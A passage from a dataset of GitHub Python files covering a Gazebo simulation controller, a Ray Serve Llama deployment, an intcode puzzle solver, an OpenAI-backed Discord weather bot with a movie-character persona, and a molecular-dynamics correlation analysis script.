1, 1, 2, 2, 3, 3, 14,),\n (13, 4, 5, 5, 6, 6, 7, 7, 8, 14,),\n (13, 9, 9, 10, 10, 11, 11, 12, 12, 14,),\n (13, 13, 13, 13, 14, 14, 14, 14, 14, 14,),)\n print(color_map(regions))\n print('bc:', color_map_bc(regions))\n\n\ndef test3():\n g = {1: {2, 4, 5, 3, 13},\n 2: {1, 4, 7, 3},\n 3: {2, 7, 8, 11, 1},\n 4: {1, 2, 5, 6, 7},\n 5: {1, 4, 6, 12, 13, 11},\n 6: {5, 4, 7, 10, 12, 2},\n 7: {2, 3, 8, 10, 6, 4, 9},\n 8: {3, 9, 7, 11},\n 9: {8, 10, 11, 7},\n 10: {7, 9, 11, 12, 6},\n 11: {13, 12, 10, 9, 3, 5, 8},\n 12: {6, 5, 10, 11, 13},\n 13: {11, 12, 5, 1}}\n print('t3: ', color_graph(g))\n\n\nif __name__ == '__main__':\n test_funcs = [test0, test1, test3]\n for test in test_funcs:\n test()\n","repo_name":"diwert-ai/Problems","sub_path":"Problems/Checkio/Simple/color map.py","file_name":"color map.py","file_ext":"py","file_size_in_byte":4502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"31165802282","text":"#!/usr/bin/env python3\n\nimport traceback\nfrom typing import List\nfrom typing import Tuple\nfrom typing import Dict\nimport time\nimport gazebo_msgs\nimport gazebo_msgs.srv\nimport rosgraph_msgs\n\nimport rospy\nfrom std_srvs.srv import Empty\n\nfrom lr_gym.envControllers.RosEnvController import RosEnvController\nfrom lr_gym.envControllers.JointEffortEnvController import JointEffortEnvController\nfrom lr_gym.envControllers.SimulatedEnvController import SimulatedEnvController \nfrom lr_gym.utils.utils import JointState, LinkState, RequestFailError\nimport os\nimport lr_gym.utils.dbg.ggLog as ggLog\nfrom lr_gym.utils.utils import Pose\nfrom lr_gym.utils.gazebo_models_manager import delete_model, spawn_model\n\n\nclass GazeboControllerNoPlugin(RosEnvController, JointEffortEnvController, SimulatedEnvController):\n \"\"\"This class allows to control the execution of a Gazebo simulation.\n\n It only uses the default gazebo plugins which are usually included in the installation.\n Because of this the duration of the simulation steps may not be accurate and simulation\n speed is low due to communication overhead.\n \"\"\"\n\n def __init__( self,\n usePersistentConnections : bool = False,\n stepLength_sec : float = 0.001,\n rosMasterUri : str = None):\n \"\"\"Initialize the Gazebo controller.\n\n Parameters\n ----------\n usePersistentConnections : bool\n Controls wheter to use persistent connections for the gazebo services.\n IMPORTANT: enabling this seems to create problems with the synchronization\n of the service calls. This breaks the pause/unpause/reset order and\n leads to deadlocks\n In theory it should have been fine as long as there are no connection\n problems and gazebo does not restart.\n\n Raises\n -------\n ROSException\n If it fails to find the gazebo services\n\n \"\"\"\n super().__init__()\n\n self._stepLength_sec = stepLength_sec\n self._lastUnpausedTime = 0\n self._episodeIntendedSimDuration = 0\n self._episodeWallStartTime = 0\n self._totalRenderTime = 0\n self._stepsTaken = 0\n\n self._lastStepRendered = None\n self._lastRenderResult = None\n self._usePersistentConnections = usePersistentConnections\n\n self._rosMasterUri = rosMasterUri\n\n def _makeRosConnections(self):\n serviceNames = {\"applyJointEffort\" : \"/gazebo/apply_joint_effort\",\n \"clearJointEffort\" : \"/gazebo/clear_joint_forces\",\n \"getJointProperties\" : \"/gazebo/get_joint_properties\",\n \"getLinkState\" : \"/gazebo/get_link_state\",\n \"pause\" : \"/gazebo/pause_physics\",\n \"unpause\" : \"/gazebo/unpause_physics\",\n \"get_physics_properties\" : \"/gazebo/get_physics_properties\",\n \"reset\" : \"/gazebo/reset_simulation\",\n \"setLinkState\" : \"/gazebo/set_link_state\",\n \"setLightProperties\" : \"/gazebo/set_light_properties\"}\n\n timeout_secs = 30.0\n for serviceName in serviceNames.values():\n try:\n rospy.loginfo(\"waiting for service \"+serviceName+\" ...\")\n rospy.wait_for_service(serviceName)\n rospy.loginfo(\"got service \"+serviceName)\n except rospy.ROSException as e:\n rospy.logfatal(\"Failed to wait for service \"+serviceName+\". Timeouts were \"+str(timeout_secs)+\"s. Exception = \"+str(e))\n raise\n except rospy.ROSInterruptException as e:\n rospy.logfatal(\"Interrupeted while waiting for service \"+serviceName+\". Exception = \"+str(e))\n raise\n\n self._applyJointEffortService = rospy.ServiceProxy(serviceNames[\"applyJointEffort\"], gazebo_msgs.srv.ApplyJointEffort, persistent=self._usePersistentConnections)\n self._clearJointEffortService = rospy.ServiceProxy(serviceNames[\"clearJointEffort\"], gazebo_msgs.srv.JointRequest, persistent=self._usePersistentConnections)\n self._getJointPropertiesService = rospy.ServiceProxy(serviceNames[\"getJointProperties\"], gazebo_msgs.srv.GetJointProperties, persistent=self._usePersistentConnections)\n self._getLinkStateService = rospy.ServiceProxy(serviceNames[\"getLinkState\"], gazebo_msgs.srv.GetLinkState, persistent=self._usePersistentConnections)\n self._pauseGazeboService = rospy.ServiceProxy(serviceNames[\"pause\"], Empty, persistent=self._usePersistentConnections)\n self._unpauseGazeboService = rospy.ServiceProxy(serviceNames[\"unpause\"], Empty, persistent=self._usePersistentConnections)\n self._getPhysicsProperties = rospy.ServiceProxy(serviceNames[\"get_physics_properties\"], gazebo_msgs.srv.GetPhysicsProperties, persistent=self._usePersistentConnections)\n self._resetGazeboService = rospy.ServiceProxy(serviceNames[\"reset\"], Empty, persistent=self._usePersistentConnections)\n self._setLinkStateService = rospy.ServiceProxy(serviceNames[\"setLinkState\"], gazebo_msgs.srv.SetLinkState, persistent=self._usePersistentConnections)\n self._setLightPropertiesService = rospy.ServiceProxy(serviceNames[\"setLightProperties\"], gazebo_msgs.srv.SetLightProperties, persistent=self._usePersistentConnections)\n\n #self._setGazeboPhysics = rospy.ServiceProxy(self._setGazeboPhysics, SetPhysicsProperties, persistent=self._usePersistentConnections)\n\n # Crete a publisher to manually send clock messages (used in reset, very ugly, sorry)\n self._clockPublisher = rospy.Publisher(\"/clock\", rosgraph_msgs.msg.Clock, queue_size=1)\n\n\n def startController(self):\n \"\"\"Start up the controller. This must be called after setCamerasToObserve, setLinksToObserve and setJointsToObserve.\"\"\"\n\n super().startController()\n\n self._makeRosConnections()\n\n\n rospy.loginfo(\"ROS time is \"+str(rospy.get_time())+\" pid = \"+str(os.getpid()))\n self.pauseSimulation()\n self.resetWorld()\n\n def _callService(self,serviceProxy : rospy.ServiceProxy) -> bool:\n \"\"\"Call the provided service. It retries in case of failure and handles exceptions. Returns false if the call failed.\n\n Parameters\n ----------\n serviceProxy : rospy.ServiceProxy\n ServiceProxy for the service to be called\n\n Returns\n -------\n bool\n True if the service was called, false otherwise\n\n \"\"\"\n done = False\n counter = 0\n maxRetry = 10\n while not done and not rospy.is_shutdown():\n if counter < maxRetry:\n try:\n serviceProxy.call()\n done = True\n except rospy.ServiceException as e:\n rospy.logerr(\"Service \"+serviceProxy.resolved_name+\", call failed: \"+traceback.format_exc(e))\n except rospy.ROSInterruptException as e:\n rospy.logerr(\"Service \"+serviceProxy.resolved_name+\", call interrupted: \"+traceback.format_exc(e))\n counter+=maxRetry #don't retry\n except rospy.ROSSerializationException as e:\n rospy.logerr(\"Service \"+serviceProxy.resolved_name+\", call failed to serialize: \"+traceback.format_exc(e))\n counter += 1\n else:\n rospy.logerr(\"Failed to call service\")\n break\n return done\n\n def pauseSimulation(self) -> bool:\n \"\"\"Pause the simulation.\n\n Returns\n -------\n bool\n True if the simulation was paused, false in case of failure\n\n \"\"\"\n ret = self._callService(self._pauseGazeboService)\n #rospy.loginfo(\"paused sim\")\n self._lastUnpausedTime = rospy.get_time()\n return ret\n\n def unpauseSimulation(self) -> bool:\n \"\"\"Unpause the simulation.\n\n Returns\n -------\n bool\n True if the simulation was paused, false in case of failure\n\n \"\"\"\n t = rospy.get_time()\n if self._lastUnpausedTime>t:\n rospy.logwarn(\"Simulation time increased since last pause! (time diff = \"+str(t-self._lastUnpausedTime)+\"s)\")\n ret = self._callService(self._unpauseGazeboService)\n #rospy.loginfo(\"unpaused sim\")\n return ret\n\n def isPaused(self):\n return self._getPhysicsProperties.call().pause\n \n def resetWorld(self) -> bool:\n \"\"\"Reset the world to its initial state.\n\n Returns\n -------\n bool\n True if the simulation was paused, false in case of failure\n\n \"\"\"\n self.pauseSimulation()\n totalEpSimDuration = self.getEnvSimTimeFromStart()\n\n ret = self._callService(self._resetGazeboService)\n\n self._lastUnpausedTime = 0\n\n # ggLog.info(f\"totalEpSimDuration = {totalEpSimDuration}\")\n # ggLog.info(f\"self._episodeIntendedSimDuration = {self._episodeIntendedSimDuration}\")\n totalSimTimeError = totalEpSimDuration - self._episodeIntendedSimDuration\n if abs(totalSimTimeError)>=0.1:\n rospy.logwarn(\"Episode error in simulation time keeping = \"+str(totalSimTimeError)+\"s (This is just an upper bound, may actually be fine)\")\n\n # totalEpRealDuration = time.time() - self._episodeWallStartTime\n # if self._episodeRealSimDuration!=0:\n # ratio = float(totalEpSimDuration)/self._episodeRealSimDuration\n # else:\n # ratio = -1\n # if totalEpRealDuration!=0:\n # totalRatio = float(totalEpSimDuration)/totalEpRealDuration\n # else:\n # totalRatio = -1\n # if totalEpSimDuration!=0:\n # rospy.loginfo( \"Duration: sim={:.3f}\".format(totalEpSimDuration)+\n # \" real={:.3f}\".format(totalEpRealDuration)+\n # \" sim/real={:.3f}\".format(totalRatio)+ # Achieved sim/real time ratio\n # \" step-time-only ratio ={:.3f}\".format(ratio)+ #This would be the sim/real time ratio if there was no overhead for sending actions and getting observations\n # \" totalRenderTime={:.4f}\".format(self._totalRenderTime)+\n # \" realFps={:.2f}\".format(self._stepsTaken/totalEpRealDuration)+\n # \" simFps={:.2f}\".format(self._stepsTaken/totalEpSimDuration))\n self._episodeIntendedSimDuration = 0\n self._episodeWallStartTime = time.time()\n self._totalRenderTime = 0\n self._stepsTaken = 0\n\n # Reset the time manually. Incredibly ugly, incredibly effective\n t = rosgraph_msgs.msg.Clock()\n self._clockPublisher.publish(t)\n\n\n\n #rospy.loginfo(\"resetted sim\")\n return ret\n\n\n def step(self) -> float:\n \"\"\"Run the simulation for the specified time.\n\n It unpauses and the simulation, sleeps and then pauses it back. It may not be precise.\n\n Parameters\n ----------\n runTime_secs : float\n Time to run the simulation for, in seconds\n\n Returns\n -------\n None\n\n\n Raises\n -------\n ExceptionName\n Why the exception is raised.\n\n \"\"\"\n\n t0_real = time.time()\n t0 = rospy.get_time()\n self.unpauseSimulation()\n t1 = rospy.get_time()\n rospy.sleep(self._stepLength_sec)\n t2 = rospy.get_time()\n self.pauseSimulation()\n t3 = rospy.get_time()\n tf_real = time.time()\n self._episodeIntendedSimDuration += t3 - t0\n rospy.loginfo(\"t0 = \"+str(t0)+\" t3 = \"+str(t3))\n rospy.loginfo(\"Unpaused for a duration between \"+str(t2-t1)+\"s and \"+str(t3-t0)+\"s\")\n\n self._stepsTaken+=1\n\n return self._stepLength_sec\n\n\n\n\n def setJointsEffortCommand(self, jointTorques : List[Tuple[str,str,float]]) -> None:\n for command in jointTorques:\n jointName = command[1]\n torque = command[2]\n duration_secs = self._stepLength_sec\n secs = int(duration_secs)\n nsecs = int((duration_secs - secs) * 1000000000)\n\n request = gazebo_msgs.srv.ApplyJointEffortRequest()\n request.joint_name = jointName\n request.effort = torque\n request.duration.secs = secs\n request.duration.nsecs = nsecs\n res = self._applyJointEffortService.call(request)\n if not res.success:\n rospy.logerror(\"Failed applying effort for joint \"+jointName+\": \"+res.status_message)\n\n\n def getJointsState(self, requestedJoints : List[Tuple[str,str]]) -> Dict[Tuple[str,str],JointState]:\n #ggLog.info(\"GazeboControllerNoPlugin.getJointsState() called\")\n gottenJoints = {}\n missingJoints = []\n for joint in requestedJoints:\n jointName = joint[1]\n modelName = joint[0]\n\n gotit = False\n tries = 0\n while not gotit and tries <10:\n jointProp = self._getJointPropertiesService.call(jointName) ## TODO: this ignores the model name!\n #ggLog.info(\"Got joint prop for \"+jointName+\" = \"+str(jointProp))\n gotit = jointProp.success\n tries+=1\n if gotit:\n jointState = JointState(list(jointProp.position), list(jointProp.rate), None) #NOTE: effort is not returned by the gazeoo service\n gottenJoints[(modelName,jointName)] = jointState\n else:\n missingJoints.append(joint)\n # err = \"GazeboControllerNoPlugin: Failed to get state for joint '\"+str(jointName)+\"' of model '\"+str(modelName)+\"'\"\n # ggLog.error(err)\n # raise RuntimeError(err)\n\n if len(missingJoints)>0:\n err = f\"Failed to get state for joints {missingJoints}. requested {requestedJoints}\"\n # rospy.logerr(err)\n raise RequestFailError(message=err, partialResult=gottenJoints)\n\n\n return gottenJoints\n\n\n\n def getLinksState(self, requestedLinks : List[Tuple[str,str]]) -> Dict[Tuple[str,str],LinkState]:\n gottenLinks = {}\n missingLinks = []\n for link in requestedLinks:\n linkName = link[0]+\"::\"+link[1]\n resp = self._getLinkStateService.call(link_name=linkName)\n\n if resp.success:\n linkState = LinkState( position_xyz = (resp.link_state.pose.position.x, resp.link_state.pose.position.y, resp.link_state.pose.position.z),\n orientation_xyzw = (resp.link_state.pose.orientation.x, resp.link_state.pose.orientation.y, resp.link_state.pose.orientation.z, resp.link_state.pose.orientation.w),\n pos_velocity_xyz = (resp.link_state.twist.linear.x, resp.link_state.twist.linear.y, resp.link_state.twist.linear.z),\n ang_velocity_xyz = (resp.link_state.twist.angular.x, resp.link_state.twist.angular.y, resp.link_state.twist.angular.z))\n\n gottenLinks[link] = linkState\n else:\n # err = f\"Failed to get Link state for link {linkName}: resp = {resp}\"\n # ggLog.warn(err)\n # world_props = rospy.ServiceProxy(\"/gazebo/get_world_properties\", gazebo_msgs.srv.GetWorldProperties)()\n # ggLog.error(f\"World properties are: {world_props}\")\n # model_props = rospy.ServiceProxy(\"/gazebo/get_model_properties\", gazebo_msgs.srv.GetModelProperties)(model_name=link[0])\n # ggLog.error(f\"Model '{link[0]}' properties are: {model_props}\")\n missingLinks.append(link) \n \n if len(missingLinks)>0:\n err = f\"Failed to get state for links {missingLinks}. requested {requestedLinks}\"\n # rospy.logerr(err)\n raise RequestFailError(message=err, partialResult=gottenLinks)\n \n return gottenLinks\n\n def getEnvSimTimeFromStart(self) -> float:\n return rospy.get_time()\n\n\n def setRosMasterUri(self, rosMasterUri : str):\n self._rosMasterUri = rosMasterUri\n\n def spawnModel(self, xacro_file_path : str,\n pose : Pose = Pose(0,0,0,0,0,0,1), \n args : Dict[str,str] = {}, \n model_name = \"model\", \n robot_namespace = \"\", \n reference_frame = \"world\",\n format = \"urdf\"):\n \"\"\"Spawn a model in the environment, arguments depend on the type of SimulatedEnvController\n \"\"\"\n spawn_model(xacro_file_path = xacro_file_path,\n pose = pose, \n args = args, \n model_name = model_name, \n robot_namespace = robot_namespace, \n reference_frame = reference_frame,\n format = format)\n\n\n def deleteModel(self, model : str):\n \"\"\"Delete a model from the environment\"\"\"\n delete_model(model_name=model)\n\n\n def setJointsStateDirect(self, jointStates : Dict[Tuple[str,str],JointState]):\n \"\"\"Set the state for a set of joints\n\n Parameters\n ----------\n jointStates : Dict[Tuple[str,str],JointState]\n Keys are in the format (model_name, joint_name), the value is the joint state to enforce\n \"\"\"\n raise NotImplementedError()\n \n\n def setLinksStateDirect(self, linksStates : Dict[Tuple[str,str],LinkState]):\n \"\"\"Set the state for a set of links\n\n Parameters\n ----------\n linksStates : Dict[Tuple[str,str],LinkState]\n Keys are in the format (model_name, link_name), the value is the link state to enforce\n \"\"\"\n \n ret = {}\n for item in linksStates.items():\n linkName = item[0][1]\n modelName = item[0][0]\n linkState = item[1]\n req = gazebo_msgs.srv.SetLinkStateRequest()\n req.link_state = gazebo_msgs.msg.LinkState()\n req.link_state.link_name = modelName+\"::\"+linkName\n req.link_state.reference_frame = \"world\"\n req.link_state.pose = linkState.pose.getPoseStamped(frame_id = \"world\").pose\n req.link_state.twist.linear.x = linkState.pos_velocity_xyz[0]\n req.link_state.twist.linear.y = linkState.pos_velocity_xyz[1]\n req.link_state.twist.linear.z = linkState.pos_velocity_xyz[2]\n req.link_state.twist.angular.x = linkState.ang_velocity_xyz[0]\n req.link_state.twist.angular.y = linkState.ang_velocity_xyz[1]\n req.link_state.twist.angular.z = linkState.ang_velocity_xyz[2]\n\n #print(req)\n #print(type(req))\n resp = self._setLinkStateService(req)\n \n if not resp.success:\n ggLog.error(\"Failed setting link state for link \"+modelName+\"::\"+linkName+\": \"+resp.status_message)\n # else:\n # ggLog.info(\"Successfully set Linkstate for link \"+modelName+\"::\"+linkName)\n return ret\n\n def freerun(self, duration_sec : float):\n wasPaused = self.isPaused()\n if wasPaused:\n self.unpauseSimulation()\n rospy.sleep(duration_sec)\n if wasPaused:\n self.pauseSimulation()\n\n \n def setupLight(self, gz_req : gazebo_msgs.srv.SetLightPropertiesRequest):\n res = self._setLightPropertiesService.call(gz_req)\n if not res.success:\n ggLog.error(f\"GazeboControllerNoPlugin: failed to setup Light.\\n req = {gz_req}\\n res={res}\")\n return False\n return True","repo_name":"c-rizz/lr_gym","sub_path":"lr_gym/src/lr_gym/envControllers/GazeboControllerNoPlugin.py","file_name":"GazeboControllerNoPlugin.py","file_ext":"py","file_size_in_byte":19753,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"}
+{"seq_id":"71459097643","text":"# from transformers import AutoTokenizer\nmodel_name = \"michaelfeil/ct2fast-Llama-2-7b-hf\"\n\nfrom hf_hub_ctranslate2 import GeneratorCT2fromHfHub\nimport requests\nfrom starlette.requests import Request\nfrom typing import Dict\n\nfrom ray import serve\n\n@serve.deployment(route_prefix=\"/serve/llama7b\")\nclass Llama7BDeployment:\n def __init__(self):\n self.model = GeneratorCT2fromHfHub(\n model_name_or_path=model_name,\n device=\"cpu\",\n compute_type=\"int8\",\n )\n\n async def __call__(self, request: Request) -> Dict:\n # Extracting the message from the request's JSON body\n json_data = await request.json()\n message = json_data.get(\"message\", \"\")\n\n outputs = self.model.generate(\n text=[message],\n max_length=128,\n include_prompt_in_result=False\n )\n \n # I noticed you returned {\"result\": self._msg} which would cause an error since self._msg is not defined.\n # Assuming you want to return the generated outputs:\n return {\"result\": outputs}\n\napp = Llama7BDeployment.bind()\n\n# 2: Deploy the application locally.\nserve.run(app)\n\nimport requests\n\n# Define the URL for the endpoint\nurl = \"http://localhost:8000/serve/llama7b\"\n\n# Define the payload\ndata = {\n \"message\": \"Your input text here\"\n}\n\n# Send a POST request\nresponse = requests.post(url, json=data)\n\n# Print the response\nprint(response.json())\n\n","repo_name":"JinL0/ray-serve-llama","sub_path":"llama2_7b.py","file_name":"llama2_7b.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"28170118824","text":"import StringUtilities\n\nclass CoordinatesService:\n a = 1\n\ndef DMSToDecimalDegrees(DMSString):\n if(StringUtilities.isBlank(DMSString)):\n return \"\"\n\n values = DMSString.split(\" \")\n seconds, direction = values[2][0:len(values[2]) - 1], values[2][-1]\n TheLatitudeValue = float(values[0]) + ((float(values[1])) / 60) + ((float(seconds)) / 3600)\n\n if (direction == \"W\" or direction == \"S\"):\n TheLatitudeValue = 0 - TheLatitudeValue\n\n return TheLatitudeValue","repo_name":"UdaySaiTyada/GeoSpatialRendering","sub_path":"CoordinatesService.py","file_name":"CoordinatesService.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"26729174693","text":"def make_operation (input):\n opcode = \"\"\n param1Mode = False\n param2Mode = False\n param3Mode = False\n\n parsed = list(str(input))\n parsed.reverse()\n\n idx = 0\n while idx < len(parsed):\n comp = parsed[idx]\n if idx == 0:\n opcode = comp\n elif idx == 1:\n opcode = comp + opcode\n elif idx == 2:\n if comp == \"1\":\n param1Mode = True\n elif idx == 3:\n if comp == \"1\":\n param2Mode = True\n elif idx == 4:\n if comp == \"1\":\n param3Mode = True\n idx +=1\n\n\n return [int(opcode), param1Mode, param2Mode, param3Mode]\n\ndef get_value (input, index, mode):\n if mode == False:\n return instructions[index]\n else:\n return index\n\ndef get_dest (input, index, mode):\n return index\n\ninstructions = []\n\nwith open('input.txt', 'r') as file:\n data = file.read()\n instructions = list(map(int, data.split(\",\")))\n\n# 1 - Add next two integers together, store in 3rd\n# 2 - Multiply two integers together, store in 3rd\n# 3 - Store input at address\n# 4 - Output value at address\n# 99 - End\n\ninput = 1\noutput = 0\n\nidx = 0\n\nprint(\"Have instructions\", len(instructions))\n\n# instructions[1] = 12\n# instructions[2] = 2\n\n\n\nwhile idx < len(instructions):\n raw = instructions[idx]\n print(\"Raw {}\".format(raw))\n\n operation = make_operation(raw)\n\n val = operation[0]\n param1Mode = operation[1]\n param2Mode = operation[2]\n param3Mode = operation[3]\n\n if val == 1:\n sl = instructions[idx + 1: idx + 4]\n print(\"Add slice {}\".format(sl))\n # print(\"Slice\", sl)\n # print(instructions[idx:idx+10])\n p1 = get_value(instructions, sl[0], param1Mode)\n p2 = get_value(instructions, sl[1], param2Mode)\n newval = p1 + p2\n # dest = sl[2]\n dest = get_dest(instructions, sl[2], param3Mode)\n instructions[dest] = newval\n idx += 4\n elif val == 2:\n sl = instructions[idx + 1: idx + 4]\n print(\"Mul slice {}\".format(sl))\n p1 = get_value(instructions, sl[0], param1Mode)\n p2 = get_value(instructions, sl[1], param2Mode)\n newval = p1 * p2\n # dest = sl[2]\n dest = get_dest(instructions, sl[2], param3Mode)\n instructions[dest] = newval\n idx += 4\n elif val == 3:\n dest = get_dest(instructions, instructions[idx+1], param1Mode)\n instructions[dest] = input\n print(\"Input set {} to value {}\".format(dest, input))\n idx += 2\n elif val == 4:\n val = instructions[idx+1] if param1Mode else instructions[instructions[idx+1]]\n output = val\n print(\"Output set {} to value {}\".format(dest, output))\n\n idx += 2\n else:\n print(\"Breaking at val {}\".format(val))\n break\n\nprint (\"Diagnostic code \", output)\n\n\n ","repo_name":"chedabob/adventofcode-2019","sub_path":"day5/day5p1.py","file_name":"day5p1.py","file_ext":"py","file_size_in_byte":2870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"34158217537","text":"import discord\r\nimport time\r\nimport os\r\nimport requests\r\nfrom discord.ext import commands\r\nimport openai\r\nfrom dotenv import load_dotenv \r\nload_dotenv()\r\n\r\nTOKEN = os.getenv('DISCORD_TOKEN')\r\nAPI_KEY = os.getenv('API_KEY')\r\napi_endpoint = 'http://dataservice.accuweather.com/forecasts/v1/daily/1day/331243?apikey=' + API_KEY\r\n# Initialize variables for chat history\r\nexplicit_input = \"\"\r\nchatgpt_output = 'Chat log: /n'\r\ncwd = os.getcwd()\r\ni = 1\r\n\r\n# Find an available chat history file\r\nwhile os.path.exists(os.path.join(cwd, f'chat_history{i}.txt')):\r\n i += 1\r\n\r\nhistory_file = os.path.join(cwd, f'chat_history{i}.txt')\r\n\r\n# Create a new chat history file\r\nwith open(history_file, 'w') as f:\r\n f.write('\\n')\r\n\r\n# Initialize chat history\r\nchat_history = ''\r\n\r\n#api\r\ndata = ''\r\nresponse = requests.get(api_endpoint)\r\nif response.status_code == 200:\r\n data = response.json()\r\n print(data)\r\nelse:\r\n print(f\"Error: {response.status_code}\")\r\n\r\n#OPEN AI STUFF\r\n#Put your key in the .env File and grab it here\r\nopenai.api_key = os.getenv(\"OPENAI_API_KEY\")\r\n\r\nname = 'Flint Lockwood'\r\n\r\nrole = 'meteorologist'\r\n# Define the impersonated role with instructions\r\nimpersonated_role = f\"\"\"\r\n From now on, you are going to act as {name}. Your role is {role}. You must act like we are in the cloudy with a chance of meatballs world.\r\n When it rains, you must act like it is raining meatballs. Use the weather given from this JSON {data}.\"\"\"\r\n\r\n# Function to complete chat input using OpenAI's GPT-3.5 Turbo\r\ndef chatcompletion(user_input, impersonated_role, explicit_input, chat_history):\r\n output = openai.ChatCompletion.create(\r\n model=\"gpt-3.5-turbo-0301\",\r\n temperature=1,\r\n presence_penalty=0,\r\n frequency_penalty=0,\r\n max_tokens=2000,\r\n messages=[\r\n {\"role\": \"system\", \"content\": f\"{impersonated_role}. Conversation history: {chat_history}\"},\r\n {\"role\": \"user\", \"content\": f\"{user_input}. {explicit_input}\"},\r\n ]\r\n )\r\n\r\n for item in output['choices']:\r\n chatgpt_output = item['message']['content']\r\n\r\n return chatgpt_output\r\n\r\n# Function to handle user chat input\r\ndef chat(user_input):\r\n global chat_history, name, chatgpt_output\r\n current_day = time.strftime(\"%d/%m\", time.localtime())\r\n current_time = time.strftime(\"%H:%M:%S\", time.localtime())\r\n chat_history += f'\\nUser: {user_input}\\n'\r\n chatgpt_raw_output = chatcompletion(user_input, impersonated_role, explicit_input, chat_history).replace(f'{name}:', '')\r\n chatgpt_output = f'{name}: {chatgpt_raw_output}'\r\n chat_history += chatgpt_output + '\\n'\r\n with open(history_file, 'a') as f:\r\n f.write('\\n'+ current_day+ ' '+ current_time+ ' User: ' +user_input +' \\n' + current_day+ ' ' + current_time+ ' ' + chatgpt_output + '\\n')\r\n f.close()\r\n return chatgpt_raw_output\r\n\r\n\r\n#DISCORD STUFF\r\nintents = discord.Intents().all()\r\nclient = commands.Bot(command_prefix=\"!\", intents=intents)\r\n#Set up your commands to grab them.\r\n\r\n@client.event\r\nasync def on_ready():\r\n print(\"Bot is ready\")\r\n\r\n@client.command()\r\nasync def location(ctx):\r\n await ctx.send(\"Hello, I provide forecast information for Charlottesville, VA.\")\r\n\r\n@client.command()\r\nasync def Help(ctx):\r\n await ctx.send(\"Hello, my name is Flint Lockwood, and I am here to answer any weather related questions for the day. You can type !help for a list of other commands, otherwise, simply ask me a question and I shall answer!\")\r\n\r\n@client.command()\r\nasync def whoami(ctx):\r\n await ctx.send(\"My name is Flint Lockwood, and I live in Swallow Falls. I am an inventor and made it so that instead of raining water, it rains food!\")\r\n\r\n@client.command()\r\nasync def rules(ctx):\r\n await ctx.send(\"No profanity! Respect Everyone. Enjoy the food that falls from the sky!\")\r\n\r\n\r\n@client.event\r\nasync def on_message(message):\r\n print(message.content)\r\n if message.author == client.user:\r\n return\r\n print(message.author)\r\n print(client.user)\r\n print(message.content)\r\n if message.content.startswith('!'):\r\n await client.process_commands(message)\r\n else:\r\n answer = chat(message.content)\r\n await message.channel.send(answer)\r\n\r\n\r\n@client.command()\r\n@commands.is_owner()\r\nasync def shutdown(context):\r\n exit()\r\n#load data in a stats table\r\n\r\n\r\nclient.run(TOKEN)","repo_name":"kttsai1/DS2002","sub_path":"data_project_2/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":4380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"19160741328","text":"from DiscUtils import *\nimport matplotlib.pyplot as plt\n\n\n# Trajectory paths\ndcdPath = '../Current_D1_trajectory/D1_combined_pbc_fixed.dcd'\npsfPath = '../Current_D1_trajectory/D1_combined.psf'\ndt = 2e-10 \n\ndef P_2(v, t):\n # the second order Legendre polynomial\n intervals = len(v) - t\n total = 0.0\n for t_0 in range(intervals):\n total += (np.vdot(v[t_0], v[t_0+t]) ** 2)\n avg = total / (intervals)\n return (3/2.) * avg - (1/2.)\n\n\ndef cos2theta_fun(initpos, pos):\n return np.power(np.vdot(initpos,pos),2)\n\n\ndef main():\n u = mda.Universe(psfPath, dcdPath)\n nframes = len(u.trajectory)\n # coarse grain atoms \n x1 = u.select_atoms('bynum 21', updating=True)\n x2 = u.select_atoms('bynum 232', updating=True)\n y1 = u.select_atoms('bynum 121', updating=True)\n y2 = u.select_atoms('bynum 332', updating=True)\n\n xs = np.zeros(nframes)\n x_axis_positions = np.zeros((nframes, 3))\n y_axis_positions = np.zeros((nframes, 3))\n z_axis_positions = np.zeros((nframes, 3))\n u_positions = np.zeros((nframes, 3))\n for i,ts in enumerate(u.trajectory):\n # Get local coordinate axes \n x1_pos = x1[0].position\n x2_pos = x2[0].position\n x = (x1_pos - x2_pos) / (np.linalg.norm(x1_pos - x2_pos))\n y1_pos = y1[0].position\n y2_pos = y2[0].position\n y = (y1_pos - y2_pos) / (np.linalg.norm(y1_pos - y2_pos))\n z = np.cross(x, y) \n \n x_axis_positions[i] = x \n y_axis_positions[i] = y \n z_axis_positions[i] = z / np.linalg.norm(z) \n \n # The unit vector is attached to one of the x-axis points\n # and subtends a 45 degree angle with the horizon\n tvec = (x + y + z) / np.linalg.norm(x + y + z)\n tpos = x1_pos + tvec \n u_positions[i] = (tpos - x1_pos) / np.linalg.norm(tpos - x1_pos)\n u_positions[i][0] = -u_positions[i][0]\n # X points for graphing \n #xs[i] = dt * i \n xs[i] = dt * i / (1e-9) \n\n print('initial pos of unit vector: {}'.format(u_positions[0]))\n print('initial pos of z-axis: {}'.format(z_axis_positions[0]))\n n = 6000 \n v = np.zeros(n)\n v[0] = 0\n theta = np.arccos(np.vdot(u_positions[0], z_axis_positions[0]))\n cos2theta = np.power(np.cos(theta), 2)\n sin2theta = np.power(np.sin(theta), 2) \n sin4theta = np.power(np.sin(theta), 4)\n alpha1 = (1/4.) * np.power((3 * cos2theta-1), 2)\n alpha2 = 3 * sin2theta * cos2theta\n alpha3 = (3/4.) * sin4theta\n initpos = u_positions[0]\n\n mod_positions = u_positions[:6000]\n for t in range(1,n):\n v[t] = P_2(mod_positions,t) \n\n \n # Fit to sum of exponentials\n def exponential_model(t,tau1, tau2, tau3):\n return alpha1 * np.exp(-t/tau1) + alpha2 * np.exp(-t/tau2) + alpha3 * np.exp(-t/tau3)\n\n v_fit = v[1:] # fitting cutoffs \n def fitfun(taus):\n l = len(v_fit)\n s = 0.0\n for t in range(l):\n s += np.power(v_fit[t]-exponential_model(t*dt,taus[0],taus[1],taus[2]), 2)\n s /= l \n return np.sqrt(s)\n\n from scipy import optimize\n minimum = 